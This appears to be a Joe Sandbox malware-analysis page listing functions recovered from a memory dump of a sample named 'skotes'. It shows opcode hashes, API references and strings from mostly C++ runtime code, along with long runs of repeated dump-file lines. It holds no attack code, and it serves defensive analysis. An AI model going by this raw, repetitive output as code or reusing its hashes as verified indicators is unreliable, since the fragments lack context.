Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vv
API String ID: 3213747228-607297253
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 6c7083fed2a8049aca15ea981f9e7456f49c71c07049fe5f865e23989fb85647
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: E2B14932A046859FDB16CF28C8857BEBBF5EF45340F1481AADC96EB242D63D9D01CB60

Function 00761B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00761B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00761B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00761C2A

Strings

pContext, xrefs: 00761C22
switchState, xrefs: 00761B5E

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: 3bedb0b7fa96a34c43ecc7ff5688213e7354bd6c8cda0a540b10b6ec7b87a5c9
Instruction ID: 53fba740d40042ec51d240c8e265344ba7badb2a7f2b55541f783deccd4ee799
Opcode Fuzzy Hash: 3bedb0b7fa96a34c43ecc7ff5688213e7354bd6c8cda0a540b10b6ec7b87a5c9
Instruction Fuzzy Hash: DF31F675A40204EBCF05EF64C899DADB375FF44310F688565EC1697282EB78EE05CB90

Function 00764E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00764E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00764E86
PMDtoOffset.LIBCMT ref: 00764EAC

Strings

Bad dynamic_cast!, xrefs: 00764EEE

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 8df257bf3620100472f6ac865f719a0aca655c8102acdc3785270e990a69ac98
Instruction ID: f373f1fa167cc2e631601adcc047da96f7cd4f846e99f022c11e808980a38a1f
Opcode Fuzzy Hash: 8df257bf3620100472f6ac865f719a0aca655c8102acdc3785270e990a69ac98
Instruction Fuzzy Hash: 5721C772A00205EFCF14DEA8DD4AEAA77B8FB44720B144119FD16D7180DB3EED0087A1

Function 0076727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 007672BE

Strings

.exe, xrefs: 007672CB
.cmd, xrefs: 007672DC
.bat, xrefs: 007672ED
.com, xrefs: 007672FE

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 6a213217c4e317eb296daffeecb0fd9686ec1db00cb57bba4a92968c96435d14
Instruction ID: 2387cddcf551b14b7613f180e02e71c6fdbed98f7d05a0fa915cab302fa533e8
Opcode Fuzzy Hash: 6a213217c4e317eb296daffeecb0fd9686ec1db00cb57bba4a92968c96435d14
Instruction Fuzzy Hash: 15018E3770865235A62E601A9D0677623988BC3BFC715002AFC15F73C1EF4CDC82A1E4

Function 0074FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0074FB06

Strings

SetThreadGroupAffinity, xrefs: 0074FA87
GetCurrentProcessorNumberEx, xrefs: 0074FABE
kernel32.dll, xrefs: 0074FA7A
GetThreadGroupAffinity, xrefs: 0074FA93

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 10f847a26770c222ce60291e77646d3126f63531fd515d370ba8a5eee8869747
Instruction ID: 770174cae55c2e0a755795b8d8230704693d3c37ff2083164a25a605187f0cd7
Opcode Fuzzy Hash: 10f847a26770c222ce60291e77646d3126f63531fd515d370ba8a5eee8869747
Instruction Fuzzy Hash: A201F5A1790315AEA711B7755C47EAB26DCDA02708730452BF805E3182EFECE80443B9

Function 00762097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 007620B7

Part of subcall function 0075CAF3: Mailbox.LIBCMT ref: 0075CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007620C8
StructuredWorkStealingQueue.LIBCMT ref: 007620FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0076210F

Strings

e, xrefs: 007620D9

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
